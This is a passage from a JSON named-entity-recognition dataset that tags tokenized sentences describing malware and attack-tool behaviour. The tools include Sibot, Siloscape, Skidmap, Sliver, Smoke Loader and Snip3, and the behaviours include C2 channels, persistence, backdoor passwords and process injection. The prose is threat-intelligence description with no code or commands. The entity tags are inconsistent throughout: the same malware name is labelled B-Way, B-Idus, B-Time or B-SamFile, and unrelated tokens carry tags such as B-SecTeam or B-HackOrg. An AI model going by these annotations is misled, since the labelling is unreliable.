"received." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "can", "download", "and", "execute", "a", "payload", "onto", "a", "compromised", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "downloaded", "a", "DLL", "to", "the", "<code>C:\\windows\\system32\\drivers\\</code>", "folder", "and", "renamed", "it", "with", "a", "<code>.sys</code>", "extension." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "modified", "the", "Registry", "to", "install", "a", "second-stage", "script", "in", "the", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sibot", "has", "been", "executed", "via", "MSHTA", "application." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Sibot", "has", "queried", "the", "registry", "for", "proxy", "server", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "executed", "downloaded", "DLLs", "with", "<code>rundll32.exe</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Sibot", "has", "been", "executed", "via", "a", "scheduled", "task." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "checked", "if", "the", "compromised", "system", "is", "configured", "to", "use", "proxies." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "retrieved", "a", "GUID", "associated", "with", "a", "present", "LAN", "connection", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "executes", "commands", "using", "VBScript." ], "ner_tags": [ "B-Way", "B-Features", "I-Features", "O", "B-Features" ] }, { "tokens": [ "Sibot", "communicated", "with", "its", "C2", "server", "via", "HTTP", "GET", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "used", "a", "legitimate", "compromised", "website", "to", "download", "DLLs", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "used", "WMI", "to", "discover", "network", "connections", "and", "configurations.", "Sibot", "has", "also", "used", "the", "Win32_Process", "class", "to", "execute", "a", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "can", "embed", "C2", "responses", "in", "the", "source", "code", "of", "a", "fake", "Flickr", "webpage." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "has", "the", "ability", "to", "upload", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "can", "decode", "and", "decrypt", "messages", "received", "from", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "has", "exfiltrated", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "has", "primarily", "used", "port", "443", "for", "C2", "but", "can", "use", "port", "80", "as", "a", "fallback." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "has", "the", "ability", "to", "search", "for", "specific", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "SideTwist", "has", "the", "ability", "to", "download", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "SideTwist", "can", "use", "<code>GetUserNameW</code>,", "<code>GetComputerNameW</code>,", "and", "<code>GetComputerNameExW</code>", "to", "gather", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "SideTwist", "has", "used", "Base64", "for", "encoded", "C2", "traffic." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "can", "encrypt", "C2", "communications", "with", "a", "randomly", "generated", "key." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "can", "collect", "the", "computer", "name", "of", "a", "targeted", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "has", "the", "ability", "to", "collect", "the", "domain", "name", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "can", "collect", "the", "username", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "has", "used", "HTTP", "GET", "and", "POST", "requests", "over", "port", "443", "for", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SideTwist", "can", "execute", "shell", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "connects", "to", "an", "IRC", "server", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Siloscape", "can", "send", "kubectl", "commands", "to", "victim", "clusters", "through", "an", "IRC", "channel", "and", "can", "run", "kubectl", "locally", "to", "spread", "once", "within", "a", "victim", "cluster." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "has", "decrypted", "the", "password", "of", "the", "C2", "server", "with", "a", "simple", "byte", "by", "byte", "XOR.", "Siloscape", "also", "writes", "both", "an", "archive", "of", "Tor", "and", "the", "<code>unzip</code>", "binary", "to", "disk", "from", "data", "embedded", "within", "the", "payload", "using", "Visual", "Studio’s", "Resource", "Manager." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "maps", "the", "host’s", "C", "drive", "to", "the", "container", "by", "creating", "a", "global", "symbolic", "link", "to", "the", "host", "through", "the", "calling", "of", "<code>NtSetInformationSymbolicLink</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "is", "executed", "after", "the", "attacker", "gains", "initial", "access", "to", "a", "Windows", "container", "using", "a", "known", "vulnerability." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "has", "leveraged", "a", "vulnerability", "in", "Windows", "containers", "to", "perform", "an", "Escape", "to", "Host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "searches", "for", "the", "Kubernetes", "config", "file", "and", "other", "related", "files", "using", "a", "regular", "expression." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-SamFile", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "uses", "Tor", "to", "communicate", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Tool", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Siloscape", "makes", "various", "native", "API", "calls." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Siloscape", "itself", "is", "obfuscated", "and", "uses", "obfuscated", "API", "calls." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Siloscape", "checks", "for", "Kubernetes", "node", "permissions." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "searches", "for", "the", "kubectl", "binary." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "impersonates", "the", "main", "thread", "of", "<code>CExecSvc.exe</code>", "by", "calling", "<code>NtImpersonateThread</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Siloscape", "can", "run", "cmd", "through", "an", "IRC", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skeleton", "Key", "is", "used", "to", "patch", "an", "enterprise", "domain", "controller", "authentication", "process", "with", "a", "backdoor", "password.", "It", "allows", "adversaries", "to", "bypass", "the", "standard", "authentication", "system", "to", "use", "a", "defined", "password", "for", "all", "accounts", "authenticating", "to", "that", "domain", "controller." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "installed", "itself", "via", "crontab." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "download,", "unpack,", "and", "decrypt", "tar.gz", "files", "." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "B-HackOrg", "B-Features", "O" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "set", "SELinux", "to", "permissive", "mode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "encrypted", "it's", "main", "payload", "using", "3DES." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Skidmap", "has", "checked", "for", "the", "existence", "of", "specific", "files", "including", "<code>/usr/sbin/setenforce</code>", "and", "<code>", "/etc/selinux/config</code>.", "It", "also", "has", "the", "ability", "to", "monitor", "the", "cryptocurrency", "miner", "file", "and", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "download", "files", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "install", "several", "loadable", "kernel", "modules", "(LKMs)", "on", "infected", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "created", "a", "fake", "<code>rm</code>", "binary", "to", "replace", "the", "legitimate", "Linux", "binary." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "replace", "the", "pam_unix.so", "file", "on", "an", "infected", "machine", "with", "its", "own", "malicious", "version", "that", "accepts", "a", "specific", "backdoor", "password", "for", "all", "users." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "monitored", "critical", "processes", "to", "ensure", "resiliency." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "is", "a", "kernel-mode", "rootkit", "used", "for", "cryptocurrency", "mining." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O" ] }, { "tokens": [ "Skidmap", "is", "a", "kernel-mode", "rootkit", "that", "has", "the", "ability", "to", "hook", "system", "calls", "to", "hide", "specific", "files", "and", "fake", "network", "and", "CPU-related", "statistics", "to", "make", "the", "CPU", "load", "of", "the", "infected", "machine", "always", "appear", "low." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "add", "the", "public", "key", "of", "its", "handlers", "to", "the", "<code>authorized_keys</code>", "file", "to", "maintain", "persistence", "on", "an", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "check", "if", "<code>/usr/sbin/setenforce</code>", "exists.", "This", "file", "controls", "what", "mode", "SELinux", "is", "in." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "the", "ability", "to", "check", "whether", "the", "infected", "system’s", "OS", "is", "Debian", "or", "RHEL/CentOS", "to", "determine", "which", "cryptocurrency", "miner", "it", "should", "use." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Skidmap", "has", "used", "<code>pm.sh</code>", "to", "download", "and", "install", "its", "main", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "has", "the", "ability", "to", "manipulate", "user", "tokens", "on", "targeted", "Windows", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "use", "mutual", "TLS", "and", "RSA", "cryptography", "to", "exchange", "a", "session", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "support", "C2", "communications", "over", "DNS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Sliver", "can", "encrypt", "strings", "at", "compile", "time." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "exfiltrate", "files", "from", "the", "victim", "using", "the", "<code>download</code>", "command." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Sliver", "can", "enumerate", "files", "on", "a", "target", "system." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "upload", "files", "from", "the", "C2", "server", "to", "the", "victim", "machine", "using", "the", "<code>upload</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Sliver", "can", "inject", "code", "into", "local", "and", "remote", "processes." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "take", "screenshots", "of", "the", "victim’s", "active", "display." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "use", "standard", "encoding", "techniques", "like", "gzip", "and", "hex", "to", "ASCII", "to", "encode", "the", "C2", "communication", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "encode", "binary", "data", "into", "a", ".PNG", "file", "for", "C2", "communication." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "Sliver", "can", "use", "AES-GCM-256", "to", "encrypt", "a", "session", "key", "for", "C2", "message", "exchange." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sliver", "has", "the", "ability", "to", "gather", "network", "configuration", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Sliver", "can", "collect", "network", "connection", "information." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Sliver", "has", "the", "ability", "to", "support", "C2", "communications", "over", "HTTP/S." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Small", "Sieve", "can", "use", "SSL/TLS", "for", "its", "HTTPS", "Telegram", "Bot", "API-based", "C2", "channel." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "has", "the", "ability", "to", "use", "the", "Telegram", "Bot", "API", "from", "Telegram", "Messenger", "to", "send", "and", "receive", "messages." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "can", "only", "execute", "correctly", "if", "the", "word", "`Platypus`", "is", "passed", "to", "it", "on", "the", "command", "line." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "has", "the", "ability", "to", "download", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Small", "Sieve", "can", "use", "variations", "of", "Microsoft", "and", "Outlook", "spellings,", "such", "as", "\"Microsift\",", "in", "its", "file", "names", "to", "avoid", "detection." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "can", "use", "a", "custom", "hex", "byte", "swapping", "encoding", "scheme", "to", "obfuscate", "tasking", "traffic." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "has", "the", "ability", "to", "use", "a", "custom", "hex", "byte", "swapping", "encoding", "scheme", "combined", "with", "an", "obfuscated", "Base64", "function", "to", "protect", "program", "strings", "and", "Telegram", "credentials." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "can", "use", "Python", "scripts", "to", "execute", "commands." ], "ner_tags": [ "O", "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "has", "the", "ability", "to", "add", "itself", "to", "`HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift`", "for", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "can", "obtain", "the", "IP", "address", "of", "a", "victim", "host." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Purp", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "can", "obtain", "the", "id", "of", "a", "logged", "in", "user." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Small", "Sieve", "can", "contact", "actor-controlled", "C2", "servers", "by", "using", "the", "Telegram", "API", "over", "HTTPS." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "Small", "Sieve", "can", "use", "`cmd.exe`", "to", "execute", "commands", "on", "a", "victim's", "system." ], "ner_tags": [ "O", "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "searches", "for", "files", "named", "logins.json", "to", "parse", "for", "credentials." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "searches", "for", "credentials", "stored", "from", "web", "browsers." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "deobfuscates", "its", "code." ], "ner_tags": [ "I-HackOrg", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "uses", "a", "simple", "one-byte", "XOR", "method", "to", "obfuscate", "values", "in", "the", "malware." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "recursively", "searches", "through", "directories", "for", "files." ], "ner_tags": [ "B-Tool", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "downloads", "a", "new", "version", "of", "itself", "once", "it", "has", "installed.", "It", "also", "downloads", "additional", "plugins." ], "ner_tags": [ "I-HackOrg", "B-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Smoke", "Loader", "searches", "through", "Outlook", "files", "and", "directories", "(e.g.,", "inbox,", "sent,", "templates,", "drafts,", "archives,", "etc.)." ], "ner_tags": [ "B-HackOrg", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "spawns", "a", "new", "copy", "of", "c:\\windows\\syswow64\\explorer.exe", "and", "then", "replaces", "the", "executable", "code", "in", "memory", "with", "malware." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "injects", "into", "the", "Internet", "Explorer", "process." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "adds", "a", "Registry", "Run", "key", "for", "persistence", "and", "adds", "a", "script", "in", "the", "Startup", "folder", "to", "deploy", "the", "payload." ], "ner_tags": [ "I-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "launches", "a", "scheduled", "task." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "scans", "processes", "to", "perform", "anti-VM", "checks." ], "ner_tags": [ "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Smoke", "Loader", "adds", "a", "Visual", "Basic", "script", "in", "the", "Startup", "folder", "to", "deploy", "the", "payload." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Smoke", "Loader", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Snip3", "can", "obfuscate", "strings", "using", "junk", "Chinese", "characters." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "decode", "its", "second-stage", "PowerShell", "script", "prior", "to", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "has", "been", "delivered", "to", "targets", "via", "downloads", "from", "malicious", "domains." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "execute", "PowerShell", "scripts", "in", "a", "hidden", "window." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "download", "additional", "payloads", "to", "compromised", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "gain", "execution", "through", "the", "download", "of", "visual", "basic", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "has", "been", "executed", "through", "luring", "victims", "into", "clicking", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Snip3", "can", "download", "and", "execute", "additional", "payloads", "and", "modules", "over", "separate", "communication", "channels." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "has", "the", "ability", "to", "obfuscate", "strings", "using", "XOR", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Snip3", "can", "use", "a", "PowerShell", "script", "for", "second-stage", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "use", "RunPE", "to", "execute", "malicious", "payloads", "within", "a", "hollowed", "Windows", "process." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Snip3", "can", "create", "a", "VBS", "file", "in", "startup", "to", "persist", "after", "system", "restarts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "has", "been", "delivered", "to", "victims", "through", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Snip3", "has", "been", "delivered", "to", "victims", "through", "e-mail", "links", "to", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Snip3", "has", "the", "ability", "to", "detect", "Windows", "Sandbox,", "VMWare,", "or", "VirtualBox", "by", "querying", "`Win32_ComputerSystem`", "to", "extract", "the", "`Manufacturer`", "string." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-SamFile", "B-SecTeam", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "has", "the", "ability", "to", "query", "`Win32_ComputerSystem`", "for", "system", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "execute", "`WScript.Sleep`", "to", "delay", "execution", "of", "its", "second", "stage." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "use", "visual", "basic", "scripts", "for", "first-stage", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Snip3", "can", "download", "additional", "payloads", "from", 